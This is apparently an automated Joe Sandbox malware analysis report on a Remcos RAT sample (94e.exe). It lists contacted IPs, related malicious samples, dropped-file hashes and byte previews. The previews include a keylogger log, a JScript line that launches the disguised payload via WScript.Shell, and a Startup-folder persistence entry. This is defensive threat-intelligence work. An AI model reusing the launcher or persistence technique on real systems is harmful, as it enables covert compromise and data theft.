                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  101.99.94.64
                  unknownMalaysia
                  45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
                  178.237.33.50
                  geoplugin.netNetherlands
                  8455ATOM86-ASATOM86NLfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1579940
                  Start date and time:2024-12-23 16:19:48 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 21s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:94e.exe
                  Detection:MAL
                  Classification:mal92.troj.spyw.expl.evad.winEXE@30/31@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 25
                  • Number of non-executed functions: 40
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: 94e.exe
                  TimeTypeDescription
                  10:20:43API Interceptor1x Sleep call for process: 94e.exe modified
                  10:20:51API Interceptor6578304x Sleep call for process: Held.com modified
                  10:21:03API Interceptor1x Sleep call for process: SecureKey.com modified
                  15:20:52AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  178.237.33.501734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                  • geoplugin.net/json.gp
                  RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  geoplugin.net1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                  • 178.237.33.50
                  RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfile.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                  • 101.99.92.189
                  http://www.recorderkorea.com/shop/proc/indb.cart.tab.php?action=ok&tab=today&type=delete&returnUrl=https://23058.hicleanly.ca/uoeujd/shuhsdy/odog/kratos/REDIRECT/Zl2jyY/compliance@yourmom.comGet hashmaliciousUnknownBrowse
                  • 101.99.81.34
                  lg1wwLsmCX.exeGet hashmaliciousUnknownBrowse
                  • 101.99.75.174
                  lg1wwLsmCX.exeGet hashmaliciousUnknownBrowse
                  • 101.99.75.174
                  IFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                  • 101.99.75.174
                  Scan_03774843.pdfGet hashmaliciousUnknownBrowse
                  • 101.99.77.51
                  https://oyatsu-jikan.org/#Z2FyeXRocm93JG5hdGlvbmFsdHViZXN1cHBseS5jb20=Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                  • 101.99.88.67
                  442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                  • 111.90.147.125
                  442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                  • 111.90.147.125
                  ATOM86-ASATOM86NL1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 178.237.33.50
                  greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                  • 178.237.33.50
                  RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.comacronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                      9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                        Wine.exeGet hashmaliciousLummaCBrowse
                          Setup.exeGet hashmaliciousLummaCBrowse
                            GoldenContinent.exeGet hashmaliciousVidarBrowse
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                Full-Setup.exeGet hashmaliciousLummaCBrowse
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                    Process:C:\Users\user\AppData\Local\Temp\159893\Held.com
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):224
                                    Entropy (8bit):3.384036122896332
                                    Encrypted:false
                                    SSDEEP:6:6lZXdNc15YcIeeDAlOWA7DxbN2fBMMm0v:6lIec0WItN25MMl
                                    MD5:E543E00D252D96679CA2CA7F5E99D7BD
                                    SHA1:233E1E322130D1036507A614CB4166DA465BBD11
                                    SHA-256:BAB47B93B47B89C9A71C1EC006A500182A1811240FCBE0D9F0BCC4C867DD29D7
                                    SHA-512:62F3D66C9EF05C327C4E8028C19077F319C6E7403CCD89CC66E5203B57ADB00AEDAA1B2E9DC20555989AB1248A606AA10B736C91B587FF624205509A3F84DFFB
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\rmc\logs.dat, Author: Joe Security
                                    Preview:....[.2.0.2.4./.1.2./.2.3. .1.0.:.2.1.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
                                    Process:C:\Users\user\AppData\Local\Temp\159893\Held.com
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):947288
                                    Entropy (8bit):6.630612696399572
                                    Encrypted:false
                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                    MD5:62D09F076E6E0240548C2F837536A46A
                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: acronis recovery expert deluxe 1.0.0.132.rarl.exe, Detection: malicious, Browse
                                    • Filename: trZG6pItZj.exe, Detection: malicious, Browse
                                    • Filename: 9EI7wrGs4K.exe, Detection: malicious, Browse
                                    • Filename: Wine.exe, Detection: malicious, Browse
                                    • Filename: Setup.exe, Detection: malicious, Browse
                                    • Filename: GoldenContinent.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: Full-Setup.exe, Detection: malicious, Browse
                                    • Filename: Setup.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Local\Temp\159893\Held.com
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):174
                                    Entropy (8bit):4.725867201811104
                                    Encrypted:false
                                    SSDEEP:3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5iQERuAcCO7525HDGf5uWAX+Ro6p4EkD5iQE2:RiJBJHonwWDKaJkDB+uAcrA5HDGfwWD0
                                    MD5:39BB113575FB5F254534EB35FC5EBC9F
                                    SHA1:6A8AED82DC9A1AB3E3B3D873EA78C3190C8B9750
                                    SHA-256:5529447ED271D1104A7658C52ABF9655D4718AEA8FD47D2CDBF9C593865116D4
                                    SHA-512:04638B16F8DF7F998DCDA0262B0353F54A3FDB307178E6E7B28B0C0C3CC807F399DC6E4F3DEA423CA60693639D9193BB9E28FC160D4B8FCF7DB3A3E5F03E7094
                                    Malicious:true
                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\SecureKey.com\" \"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\a\"")
                                    Process:C:\Users\user\AppData\Local\Temp\159893\Held.com
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):723066
                                    Entropy (8bit):7.99971143768294
                                    Encrypted:true
                                    SSDEEP:12288:7/EcxoEPQM/0CMPJJ4OeW9kQRxmcRUzO2erLbLZItAV+Y5x1C+vtvJQgq1erqzi:bEMvByr4T7WUz/PtYrDQs22
                                    MD5:76BAFDA97331767C5B8B7A0E43A9599B
                                    SHA1:886E0F943FB4DB8C3364A17A397248B3FDDC0465
                                    SHA-256:ECE19359D4A00F3044836574E0822E68E6A2E998DF88D3E520273A57384DD500
                                    SHA-512:D72CA49B0A6B726DA5BD9E443831DFC73FAA4D28B95E1DD42A7C4E47C2DA1A741760065E6E194BB52EAED5BCFCFF4FE728DF3518723C6E27A4D540A6DF2F8E79
                                    Malicious:false
                                    Preview:=.....X...v..].....GedEy.w.......<.....0.<.%.....#.}..q ..%.8..........t.(i.vA..o\P...[.l..X5_6..Oo...y1H.nh..thv.......{k.4.@2.9#ZPT.....IA...kv./......x..(..u..."C.z7.5c2*.f..(.lbDl...e?a...w..'.^..f.....S..l]....p.0.j^.!........m.i~Ii.$hg....m..'`5..l.ij...[.f..^.!".......?2..!..R...gB..>YzCr...>...vR[..f..q......~.._.X.U...I...-.C......e.B. ..W.....E....'.?.J."d.. .O.O.y...R"[..O3...e..s.%..........=%U....H...M|}.f.U...').............GC.i..A...u.+SFa a.+'.....$.dioP....=0.v....y.... 58..F..F.....q.$.C.7.;.~..i.._..SO/....W.g.3...1.BNo.$./.Dq..`...voA.r.xY.......Li+.o.V*.v..Y....QxnK.A.^..Vx..(.iA4.r. E.z.>...../~..q(...y....|.8..o..M.D.N..\..>..{...#...!..:.F...8P._.,a...h.G...@.....,qr..]o.y../..:._'..Ll@.I@.#.J.3..N.Cs?......t.O...s.%..%...s.{...i.....TV....9..r...M....2o..bi...Z..ZQ|...(.a..).}..<3..."...iU2v.4..9Wa...........^[S.......f.......DioS.3....c....b.O.2..(...l......?a...."..2...&u.....A.F....O..R..m..y
                                    Process:C:\Users\user\AppData\Local\Temp\159893\Held.com
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):963
                                    Entropy (8bit):5.019205124979377
                                    Encrypted:false
                                    SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                    MD5:B62617530A8532F9AECAA939B6AB93BB
                                    SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                    SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                    SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                    Malicious:false
                                    Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):723066
                                    Entropy (8bit):7.99971143768294
                                    Encrypted:true
                                    SSDEEP:12288:7/EcxoEPQM/0CMPJJ4OeW9kQRxmcRUzO2erLbLZItAV+Y5x1C+vtvJQgq1erqzi:bEMvByr4T7WUz/PtYrDQs22
                                    MD5:76BAFDA97331767C5B8B7A0E43A9599B
                                    SHA1:886E0F943FB4DB8C3364A17A397248B3FDDC0465
                                    SHA-256:ECE19359D4A00F3044836574E0822E68E6A2E998DF88D3E520273A57384DD500
                                    SHA-512:D72CA49B0A6B726DA5BD9E443831DFC73FAA4D28B95E1DD42A7C4E47C2DA1A741760065E6E194BB52EAED5BCFCFF4FE728DF3518723C6E27A4D540A6DF2F8E79
                                    Malicious:true
                                    Preview:=.....X...v..].....GedEy.w.......<.....0.<.%.....#.}..q ..%.8..........t.(i.vA..o\P...[.l..X5_6..Oo...y1H.nh..thv.......{k.4.@2.9#ZPT.....IA...kv./......x..(..u..."C.z7.5c2*.f..(.lbDl...e?a...w..'.^..f.....S..l]....p.0.j^.!........m.i~Ii.$hg....m..'`5..l.ij...[.f..^.!".......?2..!..R...gB..>YzCr...>...vR[..f..q......~.._.X.U...I...-.C......e.B. ..W.....E....'.?.J."d.. .O.O.y...R"[..O3...e..s.%..........=%U....H...M|}.f.U...').............GC.i..A...u.+SFa a.+'.....$.dioP....=0.v....y.... 58..F..F.....q.$.C.7.;.~..i.._..SO/....W.g.3...1.BNo.$./.Dq..`...voA.r.xY.......Li+.o.V*.v..Y....QxnK.A.^..Vx..(.iA4.r. E.z.>...../~..q(...y....|.8..o..M.D.N..\..>..{...#...!..:.F...8P._.,a...h.G...@.....,qr..]o.y../..:._'..Ll@.I@.#.J.3..N.Cs?......t.O...s.%..%...s.{...i.....TV....9..r...M....2o..bi...Z..ZQ|...(.a..).}..<3..."...iU2v.4..9Wa...........^[S.......f.......DioS.3....c....b.O.2..(...l......?a...."..2...&u.....A.F....O..R..m..y
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):947288
                                    Entropy (8bit):6.630612696399572
                                    Encrypted:false
                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                    MD5:62D09F076E6E0240548C2F837536A46A
                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\94e.exe
                                    File Type:Microsoft Cabinet archive data, 487450 bytes, 10 files, at 0x2c +A "Momentum" +A "Exam", ID 5078, number 1, 29 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):487450
                                    Entropy (8bit):7.998586208915222
                                    Encrypted:true
                                    SSDEEP:12288:cYicITtxnVTuCmmLgASzlukH+MG6hrLMtDLAWB1:HicIT3nV6aLSzlucay/wj
                                    MD5:D621FCD09DA6814A53B15876CCBA0ABE
                                    SHA1:5CA5CC9205012129FCE9113E0EF0B1F61B619AFD
                                    SHA-256:D825C78148DE5E945EECF001FB997CD834874629CFFC9F50E47281CB55092CF5
                                    SHA-512:17A8ED82C7682184A8653BD9CA01939AB456DEAE006CC4E60DB1A0586BC36A96AB9A2216F3DE761ACA4A6D54682FF695F1BE96EF52BE44AF8CB53FF0C8CA91B8
                                    Malicious:false
                                    Preview:MSCF.....p......,......................................Y.. .Momentum............Y.. .Exam............Y.. .Belle..T.........Y.. .This..D.........Y.. .Sure......4.....Y.. .Episode....._<.....Y.. .Toll..<.._......Y.. .Limit..4.._......Y.. .Once..4.._@.....Y.. .Verde..h..^M..CK.}.|....G........5.h.E...A.a.P..!d.....n.}..3|(....L.K.~T[.Rm...Wk-..B.l.....P....l7..k.l f..;....?.fg...8..s..=..yg.~V_X1........J. ...R....x)>....P....R`(.~C....U#@.C...!.)....P.s:...y..,....u.>.+.JV...V......]3.z..<3....`...6...ko.....1....-T..5.T.....]..,5..-.v...C3q..yY..o....5...;y_.K/.e..W...Z......S..m.....i.....CF...T..'.;..k....9.........kV..........L........w...E.'..Il..+....C.._....h.z....A.3........K.....W.+..,.le...P..b/..p.l...,....Z..b........5.9\S...1...K.....N.M....L.....Cs'Y.......`k...:i(..:...Y.r...C.......|..S.$....y..b.'Q...nc..".V.6....48.qkV.<.FJ.a#....Z.....B......E...B........r..d.J.~.x.f"...IR../I.....zV..X:G.j....q.6#V...#....l.Wc6.{..AfI.>........?....
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):5.77220123860665
                                    Encrypted:false
                                    SSDEEP:1536:XnHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPS:3LeAg0Fuz08XvBNbjaAtsPS
                                    MD5:8CA9A025294269CFBA53E50219A81AC0
                                    SHA1:FDF5E3A40F5D7BD4EA9672107479A1F8063B2B74
                                    SHA-256:802ED1EADE5979FA97A2D58F124BE2C960B63F5B058F353099F8F8D476B4767C
                                    SHA-512:7542DC4B8AAF0BF5549242B001ECCFBC8DEABEEA44F7106853EA69A33062B59C0D4C8F0C1D34A98E5B9DD3FACD387DDD3F604D944B660213360B9E96BC123CA3
                                    Malicious:false
                                    Preview:.m.s.-.w.i.n.-.n.t.u.s.e.r.-.w.i.n.d.o.w.s.t.a.t.i.o.n.-.l.1.-.1.-.0.....a.d.v.a.p.i.3.2.....k.e.r.n.e.l.3.2.....u.s.e.r.3.2.............CompareStringEx.........FlsAlloc............FlsFree.........FlsGetValue.........FlsSetValue.........GetCurrentPackageId.........GetDateFormatEx.....GetSystemTimePreciseAsFileTime..........GetTimeFormatEx.........InitializeCriticalSectionEx.........LCMapStringEx...........LocaleNameToLCID........RoInitialize........RoUninitialize........ . . . . . . . . .(.(.(.(.(. . . . . . . . . . . . . . . . . . .H............................................................................................................................................................................................. . . . . . .(. . . . . . . . . . . . . . . . . . . . . . . . . . ...........................0..................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\94e.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):7.996238475606983
                                    Encrypted:true
                                    SSDEEP:768:O9I98FaCRb9f9WDHinwGm+WmGqESjP3c0MyCe2TxbRMVJstxPzZDq0:O1VV9fsLinztWgrjPGw+1aJsh1
                                    MD5:8124F527DBFF7A5CC677B149CB356730
                                    SHA1:A97B08DF47C71280627BB55AB96B23DF75C42648
                                    SHA-256:9457ED336A38E78B4138E6D26F878253DA4C307A243E4B139C9E88D727A460CE
                                    SHA-512:0CC9C801A728F83A37472417DA7863F84E3DF6B3E0C8B762B15CA795ABECBBC840ABE2B0CD076CEEBFD11EA0A32E89EAE7EBDC623F9983CED25F07B888C87940
                                    Malicious:false
                                    Preview:.-=.&[.d.>.Bp..W.Rb.q CS.....Y..C.4.}....z...U...\d)+8.`.QR8........:...>.T.......D}..`.6R..t...{Z...D..g.v_1.ms..I.F.I...j.f...o...~.....\e........N.._..([.z..A3[..<....U...(8.n..('.}.r>...Q..*`.:..].>..>.........4..C.g......#...+......|i.....q.eQ}.s....+W"....m{....+.k.e.~=..U....5.!.&...%..(:K4.4..*.....# ....q..5...>..[...!.9.oh...................92..1.."..L....C.i.....g.u>.......L.......Id..."...D._.#.....=J.ve}y.....Z.\.tU.gyF..W.C.~k...P...v$...V./..<.\.y.h.H.......AO...q8..B.;.(.X:..b..w?...c.#...YP..@.^";......O..}R..#.?.J..-..t6....M.'....*..7I1..a..pG...w...I$...j.z.|y.m.eo)....c....6....nZG.J.MaEj....2i......*8...f...B.`.B..}.6y.G.w....S....J.a...U.....eh......>.0..E.e}1....6..hT.H32.Q..E4.j..i..NQKU....!...;.].t+..IZP...{.4.\..2,.\i.]V..Z.<A..zk..7K,p.M.VM..;..`.._X..j.2.Nu./....,...}. .....\.1.e....VJQ........qg.-R.........{.t..&SV..a..*.mS....Y....E.F.|.mi..B....=.[.p..e...b...._.]+.r..rw.A..{b..~;L.....O........#.[....qB.
                                    Process:C:\Users\user\Desktop\94e.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):95232
                                    Entropy (8bit):7.997942520192341
                                    Encrypted:true
                                    SSDEEP:1536:t2b1ARfLfRVYtMuRNWDJSkwF0Fog1XVeWdPPUdozlCxGl0F9O0BVMqTIjvquAqTE:kefLJVhYwW/g1X4WBPMqlCXBVP+9tI1
                                    MD5:C28DA53F6BBF741FE9E0C043E65AAFF4
                                    SHA1:5C5E9D0D72A438F6A82F5C397CB963F943B32FB1
                                    SHA-256:9722AE27DA0176B101D20C5DC6147568D4444E9787D34FA3CF59590A127DC059
                                    SHA-512:43EE512B201A97AAC7937F7D5D73C1D0FDC435539482E37D0CA003B080B66F983D88DBC6B8E3363DBC5051593251CBB52D894830B008C26E3D31C884CCA0EE4A
                                    Malicious:false
                                    Preview:..I|-ZnB....s.&.-..?.#.....&x....&........+.NR2...6. ..|.g.j.Z..a,........fI.7;u-.A....~.,.).......3U. ..r.!..)9.u...e~..K7.mU..........Bg....*2.-K'.H..,..1..i..).....I.CgLj..!:M.Hn.......B..{....e..:.P{....a..........8.]..B..9....&.nyh..{.....B.[.@*..ezgK.T....h.Yn.K..l......a:.. (.n.d..I.X.^/{?.0.[............L9..: T.e...........qH.n'3)P......V.U......)...j....S.o.E3.pe-..E.....C.R..O.i..I.[...h..e..C.4>z....[.;...6....U..[x...i.j.%y..Hr;..X....!..v.?./.......6.Uak....h.N...Q.G.W...L......s..B...=.9...".(.o..g&;..MzH..-".....O...{.H..q....Y.....A.V..AK..bO..........l*........."..g.0{.......?H6..*(.2}...",...7-BK...`E....2Fc.$.fz.....H/9.f-.....,.n0....*.B.}.....6..?...`.;...0.d...N.....s5.._=q..E...u....d...v.a..-..BW.4.:z..M.(.%....e.?QDr...7]Y ..4D...z...sCe[.+..C.....r..u..%h}..i.&..h4...od..p1p:.O.S'.W.nX....P.{G<.....P0.7.ap3Xz...p..%.X.Y&g(z."A..[>..R6.o8.m.d4..G... .R...T..);.\...)L.je....p....v.a...X.=M...5....Y'..h.
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1942
                                    Entropy (8bit):4.919498055550784
                                    Encrypted:false
                                    SSDEEP:48:f9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhQ:lSEA5O5W+MfH5Q
                                    MD5:D9E3E192EDF72CE767F46FBE896089C4
                                    SHA1:79406BA6BB66E5C0C2663986C166EFDAD0984381
                                    SHA-256:AFC0EFD869EA325703A26540F2CF237F20E93172E211994B9F0DD7A276FF7C66
                                    SHA-512:BDC0909B5A2EBF51560A739F1D10EBF1E583B4E2A0ADDC8112D693413EBC8FB452DAEB0BBC2F57F231DE22CC156B2535DF36C262743F65B1502BDDC0CB49DB6A
                                    Malicious:false
                                    Preview:Patrick........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):128000
                                    Entropy (8bit):6.556800201639329
                                    Encrypted:false
                                    SSDEEP:3072:FJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTu7:F0CThp6vmVnjphfhnvO5bLezWW7
                                    MD5:0F4A0EE961C82926D8A1778069855B35
                                    SHA1:79114551FD7ABEF7523A092AB598B60E56AB451B
                                    SHA-256:F80CF0617F6D4653994C386FB60E27FF609A028F4A4C3CDF21C2D308A94777E2
                                    SHA-512:1E81D9824231AB2AABA63D433688638655E3F46B51AD6392985D95707CCFBA348A5A8C070031E90B4B1AE10278942D55141AB79B4755661BE7A393A84AED0FB4
                                    Malicious:false
